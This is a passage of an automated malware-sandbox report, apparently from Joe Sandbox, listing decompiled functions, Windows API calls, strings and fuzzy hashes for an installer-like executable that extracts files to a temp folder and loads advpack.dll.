                                                                                                                                                                                                                                                            • Instruction ID: 84bdaf93e1455dc9e308d13e399e2800ff1490e0f1df1553928b7894110523d9
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bd4eeb5013b78e74b0c2834515fef1201a031204fd7bc265cab77055bb7dc2a6
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5F313C75A00309EFDB109FA9EC58ABFBBB8FF04300F158429E659D6254DB709905DBB2
                                                                                                                                                                                                                                                            Function 00DF3450 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • EndDialog.USER32(?,?), ref: 00DF3490
                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00DF349A
                                                                                                                                                                                                                                                            • SetWindowTextA.USER32(?,valid), ref: 00DF34B2
                                                                                                                                                                                                                                                            • SetDlgItemTextA.USER32(?,00000838), ref: 00DF34C4
                                                                                                                                                                                                                                                            • SetForegroundWindow.USER32(?), ref: 00DF34CB
                                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000002), ref: 00DF34D8
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543830281.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543969218.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_df0000_Tii6ue74NB.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                                                                                                                                                                            • String ID: valid
                                                                                                                                                                                                                                                            • API String ID: 852535152-2349282815
                                                                                                                                                                                                                                                            • Opcode ID: a96cb0f3c4f30a1af2985b1041bcc4ecc5ba64b02878ee3aceea4a3c07f680c6
                                                                                                                                                                                                                                                            • Instruction ID: ffa46dae4440c6783f38710a59f6ed1b2ef6bf5fe76a2efdda3bb810ce465679
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a96cb0f3c4f30a1af2985b1041bcc4ecc5ba64b02878ee3aceea4a3c07f680c6
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 75018871640318ABC7165B68DC0C9BE7A64EB49700F07C020FA4AC6AA0CA319E92DBB5
                                                                                                                                                                                                                                                            Function 00DF2AAC Relevance: 12.1, APIs: 8, Instructions: 118COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00DF2AE6
                                                                                                                                                                                                                                                            • IsDBCSLeadByte.KERNEL32(00000000), ref: 00DF2AF2
                                                                                                                                                                                                                                                            • CharNextA.USER32(?), ref: 00DF2B12
                                                                                                                                                                                                                                                            • CharUpperA.USER32 ref: 00DF2B1E
                                                                                                                                                                                                                                                            • CharPrevA.USER32(?,?), ref: 00DF2B55
                                                                                                                                                                                                                                                            • CharNextA.USER32(?), ref: 00DF2BD4
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543830281.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543969218.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_df0000_Tii6ue74NB.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 571164536-0
                                                                                                                                                                                                                                                            • Opcode ID: d809488ce2217ec1417f7d182d8859b628a838a859e59f5c81f032904fe442dc
                                                                                                                                                                                                                                                            • Instruction ID: fb109f602df716d7fe51222154d2b453f3f6305316567847af9c8230ff639946
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d809488ce2217ec1417f7d182d8859b628a838a859e59f5c81f032904fe442dc
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8C4124345043899EDB159F348C54AFE7BA99F56310F0AC09AEDC6C3206DB358E86CB71
                                                                                                                                                                                                                                                            Function 00DF43D0 Relevance: 10.6, APIs: 7, Instructions: 97COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00DF43F1
                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00DF440B
                                                                                                                                                                                                                                                            • GetDC.USER32(?), ref: 00DF4423
                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 00DF442E
                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00DF443A
                                                                                                                                                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00DF4447
                                                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,00000001,?), ref: 00DF44A2
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543830281.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543969218.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_df0000_Tii6ue74NB.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2212493051-0
                                                                                                                                                                                                                                                            • Opcode ID: 02e6bd39835b39ddcf036217e6cd09174d3bab66b059133f8715c5e6a5880db2
                                                                                                                                                                                                                                                            • Instruction ID: 49012c3718df323bf252bf32cef74892f61d4342d8db04d258fe28a2226f81a0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 02e6bd39835b39ddcf036217e6cd09174d3bab66b059133f8715c5e6a5880db2
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CE310E71E00219AFCB14CFB8DD499FEBBB5EB89310F168169E905F7250DA70AD05CB61
                                                                                                                                                                                                                                                            Function 00DF6298 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00DF171E: _vsnprintf.MSVCRT ref: 00DF1750
                                                                                                                                                                                                                                                            • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,00DF51CA,00000004,00000024,00DF2F71,?,00000002,00000000), ref: 00DF62CD
                                                                                                                                                                                                                                                            • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,00DF51CA,00000004,00000024,00DF2F71,?,00000002,00000000), ref: 00DF62D4
                                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00DF51CA,00000004,00000024,00DF2F71,?,00000002,00000000), ref: 00DF631B
                                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00DF6345
                                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00DF51CA,00000004,00000024,00DF2F71,?,00000002,00000000), ref: 00DF6357
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543830281.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543969218.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_df0000_Tii6ue74NB.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                                                                            • String ID: UPDFILE%lu
                                                                                                                                                                                                                                                            • API String ID: 2922116661-2329316264
                                                                                                                                                                                                                                                            • Opcode ID: b5d44130e3a25ce7d3f7e43fab9e292a743d5e879224e2310db0d311dcebcb77
                                                                                                                                                                                                                                                            • Instruction ID: bd91271356cdc6ea9a210fed397eff84f679415642cb16152be0578eeb0828fd
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b5d44130e3a25ce7d3f7e43fab9e292a743d5e879224e2310db0d311dcebcb77
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 62210175A0021DABCB109F649C459BEBBB8EB49710B0A8129EA06E3600DB35DD06CBF1
                                                                                                                                                                                                                                                            Function 00DF681F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81registryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00DF686E
                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(0000004A), ref: 00DF68A7
                                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00DF68CC
                                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,00DF1140,00000000,?,?,?), ref: 00DF68F4
                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00DF6902
                                                                                                                                                                                                                                                              • Part of subcall function 00DF66F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,00DF691A), ref: 00DF6741
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • Control Panel\Desktop\ResourceLocale, xrefs: 00DF68C2
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543830281.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543969218.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_df0000_Tii6ue74NB.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                                                                            • String ID: Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                                                                            • API String ID: 3346862599-1109908249
                                                                                                                                                                                                                                                            • Opcode ID: 44fd5897dbe1b4c248af1cc77e394e421fb7a1590e9277f2dbf98dd07be0aa73
                                                                                                                                                                                                                                                            • Instruction ID: d434aedd05634606b03491821ad08617a445344ae1d8b1d36057513607cc04b6
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 44fd5897dbe1b4c248af1cc77e394e421fb7a1590e9277f2dbf98dd07be0aa73
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 64314171A0031C9FDB218B15DC45BBA77B8EB45754F068195EA4DE2240DB70DA85CF72
                                                                                                                                                                                                                                                            Function 00DF24E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00DF2506
                                                                                                                                                                                                                                                            • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 00DF252C
                                                                                                                                                                                                                                                            • _lopen.KERNEL32(?,00000040), ref: 00DF253B
                                                                                                                                                                                                                                                            • _llseek.KERNEL32(00000000,00000000,00000002), ref: 00DF254C
                                                                                                                                                                                                                                                            • _lclose.KERNEL32(00000000), ref: 00DF2555
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543830281.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543969218.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_df0000_Tii6ue74NB.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                                                                            • String ID: wininit.ini
                                                                                                                                                                                                                                                            • API String ID: 3273605193-4206010578
                                                                                                                                                                                                                                                            • Opcode ID: c0ada56c1643d23bfb9441fdfdfaebaf98f0721a5658f6226ad6b3c9d10bb78d
                                                                                                                                                                                                                                                            • Instruction ID: 5cb6f57a2040ee7efcbfb4cba340231a0d0fb4a423ccc7ea1b4438e2516d5716
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c0ada56c1643d23bfb9441fdfdfaebaf98f0721a5658f6226ad6b3c9d10bb78d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8601F5726002186BC7209B69AC0DEFF7B7CDB45750F018155FA48D3394DE748E45CAB5
                                                                                                                                                                                                                                                            Function 00DF36EE Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 243windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00DF3723
                                                                                                                                                                                                                                                            • MessageBeep.USER32(00000000), ref: 00DF39C3
                                                                                                                                                                                                                                                            • MessageBoxA.USER32(00000000,00000000,valid,00000030), ref: 00DF39F1
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543830281.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543969218.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_df0000_Tii6ue74NB.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Message$BeepVersion
                                                                                                                                                                                                                                                            • String ID: 3$valid
                                                                                                                                                                                                                                                            • API String ID: 2519184315-3539985779
                                                                                                                                                                                                                                                            • Opcode ID: 56cb056bdf130ad5b0c9b79f9463d6606e66f020d3ad4dd993bcd3466a631a05
                                                                                                                                                                                                                                                            • Instruction ID: b9cf01d95ceedc5739dc8e6d20578e6c6420740b846924a27ede213a39f610e5
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 56cb056bdf130ad5b0c9b79f9463d6606e66f020d3ad4dd993bcd3466a631a05
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1091C2B1A012589BDB349B25CC817BAB7A0EB45304F1BC1A9DA89DB251D774CF80CF71
                                                                                                                                                                                                                                                            Function 00DF6495 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41libraryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00DF64DF
                                                                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00DF64F9
                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00DF6502
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543830281.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543969218.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_df0000_Tii6ue74NB.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
                                                                                                                                                                                                                                                            • API String ID: 438848745-3680919256
                                                                                                                                                                                                                                                            • Opcode ID: fe3f794af4992f0ca66897fc90184160ade4a1e274092e1f07bdc7e2c5f6037d
                                                                                                                                                                                                                                                            • Instruction ID: 48e359c4bf46472ad43f47bb1463e62e943a8403a87447389e573cb895ecab3e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fe3f794af4992f0ca66897fc90184160ade4a1e274092e1f07bdc7e2c5f6037d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2701D67090020CABDB10EB64EC45EFA7778DB50310F518195F689E22C4DF70EE89CA71
                                                                                                                                                                                                                                                            Function 00DF28E8 Relevance: 7.6, APIs: 5, Instructions: 140memoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00DF2A6F
                                                                                                                                                                                                                                                              • Part of subcall function 00DF2773: CharUpperA.USER32(7504EDAB,00000000,00000000,00000000), ref: 00DF27A8
                                                                                                                                                                                                                                                              • Part of subcall function 00DF2773: CharNextA.USER32(?), ref: 00DF27B5
                                                                                                                                                                                                                                                              • Part of subcall function 00DF2773: CharNextA.USER32(00000000), ref: 00DF27BC
                                                                                                                                                                                                                                                              • Part of subcall function 00DF2773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00DF2829
                                                                                                                                                                                                                                                              • Part of subcall function 00DF2773: RegQueryValueExA.ADVAPI32(?,00DF1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00DF2852
                                                                                                                                                                                                                                                              • Part of subcall function 00DF2773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00DF2870
                                                                                                                                                                                                                                                              • Part of subcall function 00DF2773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00DF28A0
                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00DF3938,?,?,?,?,-00000005), ref: 00DF2958
                                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00DF2969
                                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00DF2A21
                                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00DF2A81
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543830281.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543969218.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_df0000_Tii6ue74NB.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3949799724-0
                                                                                                                                                                                                                                                            • Opcode ID: 5c100017d9771426a6d1c7a8cf399a9bbbbe8d80471637250be06d02f1686a2d
                                                                                                                                                                                                                                                            • Instruction ID: ef76faca2092c580c77b377f7c1ab3cfbe6004f06f1d4b2c659a7b1e958f1e7d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5c100017d9771426a6d1c7a8cf399a9bbbbe8d80471637250be06d02f1686a2d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5A511971A0021DDBDB21DF98D885ABEBBB5FF48700F15802AEA05E3351DB319941DBB4
                                                                                                                                                                                                                                                            Function 00DF4169 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 55memoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00DF468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00DF46A0
                                                                                                                                                                                                                                                              • Part of subcall function 00DF468F: SizeofResource.KERNEL32(00000000,00000000,?,00DF2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DF46A9
                                                                                                                                                                                                                                                              • Part of subcall function 00DF468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00DF46C3
                                                                                                                                                                                                                                                              • Part of subcall function 00DF468F: LoadResource.KERNEL32(00000000,00000000,?,00DF2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DF46CC
                                                                                                                                                                                                                                                              • Part of subcall function 00DF468F: LockResource.KERNEL32(00000000,?,00DF2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DF46D3
                                                                                                                                                                                                                                                              • Part of subcall function 00DF468F: memcpy_s.MSVCRT ref: 00DF46E5
                                                                                                                                                                                                                                                              • Part of subcall function 00DF468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00DF46EF
                                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,00DF30B4), ref: 00DF4189
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,00DF30B4), ref: 00DF41E7
                                                                                                                                                                                                                                                              • Part of subcall function 00DF44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00DF4518
                                                                                                                                                                                                                                                              • Part of subcall function 00DF44B9: MessageBoxA.USER32(?,?,valid,00010010), ref: 00DF4554
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543830281.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543969218.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_df0000_Tii6ue74NB.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                                            • String ID: <None>$FINISHMSG
                                                                                                                                                                                                                                                            • API String ID: 3507850446-3091758298
                                                                                                                                                                                                                                                            • Opcode ID: a8cb12a8830f176b1168c17a8b9e34d84dbc66aa16baca9375108d301d4a269b
                                                                                                                                                                                                                                                            • Instruction ID: dc68ea1ab734b03080c837eefef870b5ca0c2462e285610a074ac36fe83d5e49
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a8cb12a8830f176b1168c17a8b9e34d84dbc66aa16baca9375108d301d4a269b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5401D1F530031C7FF324166A5C86FBB218EDBD4795F07C025B709E22809EA8DC018175
                                                                                                                                                                                                                                                            Function 00DF19E0 Relevance: 7.6, APIs: 5, Instructions: 51windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • EndDialog.USER32(?,?), ref: 00DF1A18
                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00DF1A24
                                                                                                                                                                                                                                                            • LoadStringA.USER32(?,?,00000200), ref: 00DF1A4F
                                                                                                                                                                                                                                                            • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00DF1A62
                                                                                                                                                                                                                                                            • MessageBeep.USER32(000000FF), ref: 00DF1A6A
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543830281.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
